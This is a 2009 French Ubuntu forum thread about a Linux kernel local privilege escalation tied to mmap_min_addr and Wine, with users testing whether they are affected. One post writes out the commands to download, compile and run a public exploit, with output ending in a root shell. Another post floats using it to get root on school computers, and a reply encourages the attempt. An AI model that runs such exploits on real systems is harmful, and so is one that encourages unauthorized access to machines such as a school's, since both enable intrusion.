Faille locale : passez en root comme rien !

djiock · Le 05/11/2009, à 20:43

C'est tout chaud ça vient de sortir :

http://www.tux-planet.fr/local-root-exp … reference/

Eh ben je suis sous une karmic fraichement installée et... Ça marche
Donc ça fait peur.

Apparemment si /proc/sys/vm/mmap_min_addr n'est pas à 0 c'est bon, mais suffit d'installer wine pour que ce soit le cas...

Pourtant je lis que c'est bon à partir d'ibex... Bon que si on a pas cette fameuse valeur à 0 ? Ça vous le fait aussi ?

HymnToLife · Le 05/11/2009, à 21:33

Encore une ?

/facepalm

EDIT: ah non, elle est connue depuis longtemps celle-là. C'est la faute à WINE, et aux devs du noyau qui ont choisi de laisser passer ça putôt que de casser la compatibilité avec les binaires Windows. Comme dit Theo : "Ironic, isn't it?".

Dernière modification par HymnToLife (Le 05/11/2009, à 21:36)

HymnToLife · Le 05/11/2009, à 21:43

Soit dit en passant, sur mon serveur Debian :

firas@iori ~ % cat /proc/sys/vm/mmap_min_addr
4096

Et pourtant j'ai bien WINE installé.

tooguy66 · Le 05/11/2009, à 23:11

Je viens de tester et j'ai également un zéro. Histoire de combler mes lacunes dans ce domaine, qu'est-ce que l'on risque ?
Peut-on se faire hacker le pc à distance ou c'est juste en local?

Zakhar · Le 05/11/2009, à 23:27

Si ton PC est mal sécurisé et que quelqu'un parvient à s'y connecter à distance (genre en SSH), il pourra utiliser la faille.

... et j'espère qu'ils vont faire un backport dans les noyaux précédents !

Dernière modification par Zakhar (Le 05/11/2009, à 23:27)

tooguy66 · Le 06/11/2009, à 01:39

C'est pas vraiment glop c't'histoire..........

RedLemon · Le 06/11/2009, à 02:12

malgres le resultat egal a 0, cela ne marche pas sur 9.10

Le Galéanthrope · Le 06/11/2009, à 02:28

Je confirme, marche pas sous Ubuntu 9.10.

djiock · Le 06/11/2009, à 03:46

Ben.. Moi si

# whoami
root

C'est quand même bizarre, surtout si votre /proc/sys/vm/mmap_min_addr est à 0

(2.6.31-14-generic)

Dernière modification par djiock (Le 06/11/2009, à 03:47)

sebastien_frade · Le 06/11/2009, à 05:36

Ubuntu 9.04, Wine d'installé, je suis à zéro. Donc aucun soucis de mon coté.

cat /proc/sys/vm/mmap_min_addr
0

Kanoba14 · Le 06/11/2009, à 06:20

Ça vient pas de sortir, le bug est connu depuis longtemps. Ça part d'ailleurs d'un post pas piqué des hannetons d'un des développeurs d'open bsd (http://lwn.net/Articles/360312/ qui répond dans les termes à un post de linus qui avait notamment dit que open bsd était trop souvent une distribution de singes qui se branlent devant des patchs de sécurité et où il expliquait qu'un bug de sécurité doit être considéré au même titre que n'importe quel bug. (http://article.gmane.org/gmane.linux.kernel/706950.

Sur le "Ironic, isn't it" et le fait que c'est une volonté de compatibilité avec wine, j'ai pas l'impression que le dev d'open bsd ne soit ni dans les petits papiers de linus, ni de wine; et bizarrement vu que le sujet a aussi fait surface sur la mailing-list des développeurs de wine, la discussion en est pour l'instant au fait que ça ne casserait aucune compatibilité et que wine s'en tamponne le coquillard allègrement; c'est pas compliqué, elle est déjà normalement corrigé sur les dernières versions des os (comme la 9.10) et pourtant wine marche de la même façon (tout comme le montre le deuxième post d' Hymn to life)

sylvainsjc · Le 06/11/2009, à 06:30

sebastien_frade a écrit :

Ubuntu 9.04, Wine d'installé, je suis à zéro. Donc aucun soucis de mon coté.

C'est avoir la valeur à zéro qui permet d'exploiter la faille donc tu as le souci

Chez moi valeur à 65536 ( en fait même avec une valeur à zéro j'avais pas peur )

Dernière modification par sylvainsjc (Le 06/11/2009, à 06:32)

Le Galéanthrope · Le 06/11/2009, à 06:51

sebastien_frade a écrit :

Ubuntu 9.04, Wine d'installé, je suis à zéro. Donc aucun soucis de mon coté.
cat /proc/sys/vm/mmap_min_addr
0

C'est pas parce que c'est à zéro que ça va forcément marcher, teste directement l'exploit si tu veut voir que ça marche. Selon l'article, Ubuntu depuis 8.10 intègre une sécurité au noyau qui fait que ça marche pas.

sylvainsjc · Le 06/11/2009, à 06:54

http://linuxfr.org/2009/11/05/26120.html

Shyne · Le 06/11/2009, à 07:43

Sous Archlinux avec un un noyau 2.6.31:

~ % cat /proc/sys/vm/mmap_min_addr
4096
~ % id
uid=1000(shyne) gid=100(users)
~ % ./gayros
mmap: Operation not permitted
~ % id
uid=1000(shyne) gid=100(users)

sebastien_frade · Le 06/11/2009, à 13:00

sylvainsjc a écrit :

sebastien_frade a écrit :
Ubuntu 9.04, Wine d'installé, je suis à zéro. Donc aucun soucis de mon coté.
C'est avoir la valeur à zéro qui permet d'exploiter la faille donc tu as le souci
Chez moi valeur à 65536 ( en fait même avec une valeur à zéro j'avais pas peur )

Ah au temps pour moi. Ça ne me réussit pas de mal dormir. Bon, comme me l'a suggéré Le Galéanthrope, je vais tester l'exploit, ça ira plus vite.

Patrik · Le 06/11/2009, à 14:26

Ben désolé de tous vous décevoir, mais ça fonctionne très bien sur la 9.10 :

Avant l'installation de Wine :

cat /proc/sys/vm/mmap_min_addr
65536

Après l'installation de Wine :

cat /proc/sys/vm/mmap_min_addr
0

Voici l'exploit :

wget www.tux-planet.fr/public/hack/exploits/local-root-exploit-gayros.c
--2009-11-06 13:08:56-- http://www.tux-planet.fr/public/hack/exploits/local-root-exploit-gayros.c
Résolution de www.tux-planet.fr... 213.186.33.4
Connexion vers www.tux-planet.fr|213.186.33.4|:80... connecté.
requête HTTP transmise, en attente de la réponse... 200 OK
Longueur: 11133 (11K) [text/x-c]
Saving to: `local-root-exploit-gayros.c'
100%[======================================>] 11 133 --.-K/s in 0,03s
2009-11-06 13:08:56 (369 KB/s) - « local-root-exploit-gayros.c » sauvegardé [11133/11133]
patrik@Domicile:~$ gcc -o gayros local-root-exploit-gayros.c
patrik@Domicile:~$ ./gayros
We got NULL page babe!
Using kernel version 2.6.31-14-generic.
Found version 3 structure, doing our tricks in memory...
Go go go boy!
We've got bush!
# whoami
root

Oups .... !!!!

Donc, ça fonctionne parfaitement, malheureusement comme mis dans l'article, après avoir installé Wine.

:lol::lol:

sylvainsjc · Le 06/11/2009, à 14:45

La faute à Wine !!! Au fait wine c'est pas un truc pour faire tourner des machins Windows ???

Alors rien d'étonnant.

Le Galéanthrope · Le 06/11/2009, à 14:51

Chez moi ça mouline pendant un bon bout de temps puis ça affiche le "We've got bush!" mais ça passe pas en root, j'ai :

We got NULL page babe!
Using kernel version 2.6.31-14-generic.
Found version 3 structure, doing our tricks in memory...
Go go go boy!
.
We've got bush!
$ $ id
uid=1000(nyamiou) gid=1000(nyamiou) groupes=4(adm),20(dialout),24(cdrom),44(video),46(plugdev),108(lpadmin),109(sambashare),110(admin),114(netdev),1000(nyamiou)
$ whoami
nyamiou

Le noyau avec lequel j'ai testé :

$ uname -r
2.6.31-14-generic

Et, j'ai Wine :

$ cat /proc/sys/vm/mmap_min_addr
0

Dernière modification par Le Galéanthrope (Le 06/11/2009, à 14:54)

rastatux · Le 06/11/2009, à 15:10

Ubuntu 9.04, kernel 2.6.28-16-generic, wine installé :

xx@xxx:~/root$ cat /proc/sys/vm/mmap_min_addr
0
xx@xxx:~/root$ ./gayros
We got NULL page babe!
Using kernel version 2.6.28-16-generic.
Found version 3 structure, doing our tricks in memory...
Go go go boy!
.
xx@xxx:~/root$ id
uid=1000(xx) gid=1000

Voila une bonne nouvelles

edit : uname -a
Linux xxx 2.6.28-16-generic #55-Ubuntu SMP Tue Oct 20 19:48:32 UTC 2009 x86_64 GNU/Linux

Dernière modification par rastatux (Le 06/11/2009, à 18:28)

djiock · Le 06/11/2009, à 15:14

Rassuré de voir que ça n'arrive pas qu'à moi

Et pardon mais si la faille est effectivement agée, l'exploit est lui récent. Maintenant j'ai hate de voir la réactivité, on est déjà à J+1

Patrik · Le 06/11/2009, à 16:21

Pour ceux qui ont cherché, les noyaux tournant sur des processeurs multi-core ne sont apparemment pas concernés.

Le Galéanthrope · Le 06/11/2009, à 16:47

Patrik a écrit :

Pour ceux qui ont cherché, les noyaux tournant sur des processeurs multi-core ne sont apparemment pas concernés.

Ca explique tout.

N'empêche, c'est comme même assez monstrueux comme exploit, j'espère qu'il y aura une maj bientôt pour corriger ça. Au fait, ça marche sous OpenSuse ? Ca pourrait être intéressant pour moi de passer root sur les ordi de mon école

djiock · Le 06/11/2009, à 17:04

Essaie toujours

sylvainsjc · Le 06/11/2009, à 18:23

Patrik a écrit :

Pour ceux qui ont cherché, les noyaux tournant sur des processeurs multi-core ne sont apparemment pas concernés.

exact si

uname -a

retourne un contenu avec SMP comme ceci :

Linux sylvain-desktop 2.6.31-14-generic #48+ureadahead2-Ubuntu SMP Wed Oct 28 15

C'est good

Ubuntu-fr

Navigation

Liens de recherche

Annonce

#1 Le 05/11/2009, à 20:43

Faille locale : passez en root comme rien !

#2 Le 05/11/2009, à 21:33

Re : Faille locale : passez en root comme rien !

#3 Le 05/11/2009, à 21:43

Re : Faille locale : passez en root comme rien !

#4 Le 05/11/2009, à 23:11

Re : Faille locale : passez en root comme rien !

#5 Le 05/11/2009, à 23:27

Re : Faille locale : passez en root comme rien !

#6 Le 06/11/2009, à 01:39

Re : Faille locale : passez en root comme rien !

#7 Le 06/11/2009, à 02:12

Re : Faille locale : passez en root comme rien !

#8 Le 06/11/2009, à 02:28

Re : Faille locale : passez en root comme rien !

#9 Le 06/11/2009, à 03:46

Re : Faille locale : passez en root comme rien !

#10 Le 06/11/2009, à 05:36

Re : Faille locale : passez en root comme rien !

#11 Le 06/11/2009, à 06:20

Re : Faille locale : passez en root comme rien !

#12 Le 06/11/2009, à 06:30

Re : Faille locale : passez en root comme rien !

#13 Le 06/11/2009, à 06:51

Re : Faille locale : passez en root comme rien !

#14 Le 06/11/2009, à 06:54

Re : Faille locale : passez en root comme rien !

#15 Le 06/11/2009, à 07:43

Re : Faille locale : passez en root comme rien !

#16 Le 06/11/2009, à 13:00

Re : Faille locale : passez en root comme rien !

#17 Le 06/11/2009, à 14:26

Re : Faille locale : passez en root comme rien !

#18 Le 06/11/2009, à 14:45

Re : Faille locale : passez en root comme rien !

#19 Le 06/11/2009, à 14:51

Re : Faille locale : passez en root comme rien !

#20 Le 06/11/2009, à 15:10

Re : Faille locale : passez en root comme rien !

#21 Le 06/11/2009, à 15:14

Re : Faille locale : passez en root comme rien !

#22 Le 06/11/2009, à 16:21

Re : Faille locale : passez en root comme rien !

#23 Le 06/11/2009, à 16:47

Re : Faille locale : passez en root comme rien !

#24 Le 06/11/2009, à 17:04

Re : Faille locale : passez en root comme rien !

#25 Le 06/11/2009, à 18:23

Re : Faille locale : passez en root comme rien !

Pied de page des forums